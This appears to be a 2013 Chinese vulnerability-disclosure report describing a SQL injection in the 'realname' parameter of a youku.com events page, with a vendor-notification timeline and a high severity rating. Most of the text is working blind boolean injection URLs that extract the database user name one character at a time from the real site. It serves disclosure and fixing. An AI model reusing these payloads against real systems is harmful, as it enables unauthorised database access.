2013-07-21: 细节已通知厂商并且等待厂商处理中 2013-07-21: 厂商已经确认,细节仅向厂商公开 2013-07-31: 细节向核心白帽子及相关领域专家公开 2013-08-10: 细节向普通白帽子公开 2013-08-20: 细节向实习白帽子公开 2013-09-04: 细节向公众公开
看见奇迹挖洞,我也来了
首先注入点:http://events.youku.com/zuqiubaobei/index.php?realname=李燕(这个李燕我不认识,就随便找个注入)该注入点为字符型注入
接下来
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,1,1%29%29=115,1,0%29%29=1%20and%20%271%27=%271 // shttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271 // lhttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,3,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //ahttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,4,1%29%29=118,1,0%29%29=1%20and%20%271%27=%271 //vhttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,5,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //ehttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,6,1%29%29=95,1,0%29%29=1%20and%20%271%27=%271 //_http://events.youku.com/zuqiubaobei/index.php?realname=李燕' and (select if(ascii(substring(user(),7,1))=114,1,0))=1 and '1'='1 //rhttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,8,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //ehttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,9,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //ahttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,10,1%29%29=100,1,0%29%29=1%20and%20%271%27=%271 dhttp://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,11,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 e
不继续手工注入了- -
该注入点为字符型注入
你们更专业
危害等级:高
漏洞Rank:12
确认时间:2013-07-21 16:09
修复中
暂无